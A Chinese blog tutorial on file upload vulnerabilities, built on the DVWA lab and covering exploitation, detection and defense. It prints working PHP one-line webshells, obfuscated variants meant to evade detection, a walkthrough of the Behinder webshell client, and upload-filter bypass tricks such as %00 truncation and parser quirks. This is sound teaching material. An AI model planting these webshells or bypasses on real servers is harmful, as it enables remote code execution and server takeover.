文件上传漏洞笔记

漏洞成因

文件上传漏洞正是在文件上传功能中,由于对用户上传的文件数据未做有效检测或过滤不严,导致上传的恶意文件被服务端解释器解析执行,利用漏洞可获取系统控制权。
很多网站都有一些文件上传功能,常见的是图片、视频、压缩文档上传,如果网站是 PHP 写的,那么上传 PHP 到服务器就有可能被解析,若服务器支持其他语言的解析执行,比如 ASP、JSP、ASPX 等文件也可达到同等攻击效果,达到恶意代码执行。
以 DVWA 靶场的文件上传漏洞为例:
在这里插入图片描述
对应的漏洞代码如下,通过 POST 请求将文件上传到“网站根目录 /hackable/uploads/”目录:

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>

中间没有任何限制,也就是说上传 PHP 文件也可以,简单写个包含 phpinfo() 的 php 文件:

<?php phpinfo(); ?>

上传后有路径提示:
在这里插入图片描述
访问地址:http://127.0.0.1/hackable/uploads/phpinfo.php,可以看到 phpinfo() 已经被执行成功。
如果我们上传的 PHP 是更多恶意功能的脚本,就可以实现更多攻击行为。

利用漏洞上传 Webshell

1.一句话木马
提到 Webshell 木马,就不得不提下“一句话木马”。PHP 一句话木马可以通过 GET、POST、COOKIE 这几种方式提交数据,然后将数据传递给代码/命令执行函数,从而实现任意代码/命令执行。
比如以下这个一句话木马:

<?php eval(@$_GET['a']); ?>

将上述代码保存为 eval.php 并上传至网站,然后构造请求:
http://127.0.0.1/hackable/uploads/eval.php?a=phpinfo();

利用一句话木马成功执行 phpinfo() 函数。
有时为了绕过木马检测,攻击者会对一句话进行混淆变形,比如下面几句。
利用字符串拼接执行函数名:

<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST['a']);
?>

通过 base64_decode 编码执行函数名:

<?php
$a=base64_decode("ZXZhbA==")
$a($_POST['a']);
?>

由 GET 参数指定函数名和参数:

<?php $_GET['a']($_GET['b']);  ?>

行业内常称“一句话木马”为“小马”,用它来传递“大马”,因为“大马”比较容易被检测到。
2.Webshell 管理工具
攻击者常用“菜刀”“冰蝎”“蚁剑”、Weevely、Cknife 这些 Webshell 工具去连接一句话木马,其中尤以“菜刀”最为出名。
以冰蝎为例,server 目录就是用来上传服务端的小马,我们选择上传 shell.php,默认使用连接密码 rebeyond,你可根据需要自行修改,然后用密码 32 位 md5 哈希值替换 key 变量即可。
在这里插入图片描述
在这里插入图片描述
上传成功后得到地址:
http://127.0.0.1/hackable/uploads/shell.php

使用以下命令打开冰蝎客户端:
java -jar Behinder_v3.0_Beta6_linux.jar

右击菜单选择“新增”,把 shell.php 地址输入 URL,同时输入 shell.php 中的连接密码(此处我使用默认密码“rebeyond”),点击“保存”。
在这里插入图片描述
双击保存的 URL 去连接 shell.php,如果成功的话,会打开 phpinfo,同时在右上角显示“已连接”。
上面有很多附带功能,你可以管理服务器文件、执行命令还有数据库管理、执行自定义代码以及内网穿透时常用的端口映射、Socks 隧道等等功能。
之前使用“菜刀”的人比较多,也导致不少网站增加了对其的检测规则,后来不少人改用通信加密与设置连接密码的“冰蝎”,也有人基于此做了二次开发,做一些检测特征清除,从而绕过一些安全系统的查杀。

绕过上传限制

1.禁用 JS
很多时候,开发在限制上传文件格式时,仅是在前端 JS 上做简单的文件后缀名判断,若不是就中断处理。对于这种情况安装个 NoScript 插件,禁用 JS 再上传即可绕过。
2.篡改数据包
对于前端 JS 的限制,除了禁用 JS 外,我们还可以使用 curl、nc、BurpSuite 等工具构造数据包去发送请求,这样是不经过浏览器前端 JS 的处理,从而绕过限制。这里的篡改内容,可依据前端 JS 的校验内容来定,比如后缀名、Content-type 等等。
3.文件头绕过
不同文件格式有不同的文件头,比如下表:
在这里插入图片描述

这样我们就可以尝试在 php 文件前面加个图片文件头,看是否可以绕过检测,比如下面 shell.php 内容:
BM <?php phpinfo(); ?>

从这也可以看出,检测文件格式最后是文件头+后缀名都一块检测,否则仍有绕过的可能。
4.%00 截断
前端限制对防御上传漏洞的能力相对是比较弱的,更多还是得靠服务端,但如果限制不当,仍有可能绕过。比如对文件后缀、路径上的检测,有时可通过添加 %00 截断来绕过,比如:
upload.php?type=image&file=shell.php%00.jpg

5.大小写绕过
有时检测未区分文件名大小写时,可使用此方法绕过。
6.后缀别名绕过
有些执行脚本存在多个后缀别名,若网站对此检测不全时,也有可能绕过,不同语言的常用后缀如下表:
在这里插入图片描述
html 文件上传后可用于 XSS 或者钓鱼欺骗等攻击,相比其他语言可直接在服务端执行代码的危害低一些,但仍要重视。
7.结合其他漏洞绕过
可利用一些服务器的解析漏洞来绕过,比如利用 apache 对不同后缀名的处理顺序机制,当后缀名不可识别时,就往左判断,比如 shell.php.php123 有可能被识别为 php 类型来执行。
nginx 也出现过类似漏洞,比如 1.jpg/1.php 被当作 php 来执行,这种服务端解析漏洞就比较难单纯依靠网站代码来解决,前提还是需要先堵住漏洞。

如何发现上传漏洞

1.黑盒扫描
在日常的网站扫描中,一般不会上传真实的木马,常常使用 phpinfo 来代替,这样对业务的影响是最小的。有时也会 echo 一段字符串来代替,但这种有时被外部发现,又可能被外部炒作被黑,存在公关风险。
当爬虫网页时,若发现存在文件上传功能,就自动构造请求上传包含以下代码的文件:

<?php phpinfo(); ?>

先根据返回包特征判断是否上传成功,然后再去寻找上传路径。扫描器可以设置一个随机文件名,然后再常见目录去检测是否上传成功。
如果是自家服务器,你倒可以在服务器上布署个文件创建的监控,然后根据文件名获取上传路径,最后访问文件路径判断是否可访问。这种做法的通用相对比较差,很多时候也并不是对自己服务器的测试。
2.流量监测
由于黑盒扫描对上传文件路径的确认比较困难,所以流量监测成为一种常用方法,不仅是上传漏洞,其实其他漏洞也同样适用的。
通过监测流量中疑似的 webshell,获取相关请求数据告警出来,然后再人工确认,我们在用这种方法在实际业务中多次发现上传漏洞。
3.白盒审计
如果手上有源代码,直接审计代码也是一种不错方式。在 PHP 中是通过 $_FILE 来读取文件,它拥有以下几个常用属性:

  • $_FILES[file][‘name’]:上传文件名
  • $_FILES[file][‘tmp_name’]:存储在服务器的文件的临时副本的名称
  • $_FILES[file][‘size’]:上传文件大小
  • $_FILES[file][‘type’]:上传文件类型

其中的 name 与 tmp_name 可以理解为污染源触发上传文件存储的函数常见于:move_uploaded_file,审计代码时就可以先从此函数入手,看其参数是否有来源于上述污染源数据,并且中间无任何的上传限制,那就有可能存在上传漏洞,最后再手工上传验证下。

漏洞防御

对于上传漏洞的修复和防御,可以从以下几方面入手:

  1. 严格检测上传文件后缀名、文件头、Content-type,尽量采用白名单方式限制。

  2. 重编码文件,比如对图片或视频做转换处理。

  3. 限制文件大小,避免被恶意上传大文件造成存储空间不足,进而网站无法正常运行。

  4. 在服务端本地检测 Webshell,发现后告警出来,人工确认后再删除,同时排查是否为外部入侵导致的,查日志去追踪可能存在的漏洞来源。

  5. 使用 WAF 拦截木马的上传,这种可能比较容易被绕过。

  6. 使用 RASP 在服务端中对于执行脚本的关键函数进行 hook,比如 php eval,在触发外部数据输入执行时就告警和阻断。

  7. 限制上传目录可不解析,不同的服务器有不同的配置方式,比如 Nginx 可按如下方式配置。
    location ~* ^/uploads/.*.(php|php5)$
    {
    deny all;
    }

  8. 上传文件重命名,建议使用随机文件名。

  9. 隐藏上传文件路径相关信息,比如关闭错误回显,不要像本课中的 DVWA 靶场的题目那样直接把上传路径直接返回。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:大白 设计师:CSDN官方博客 返回首页
评论

打赏作者

看客过客皆是客

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值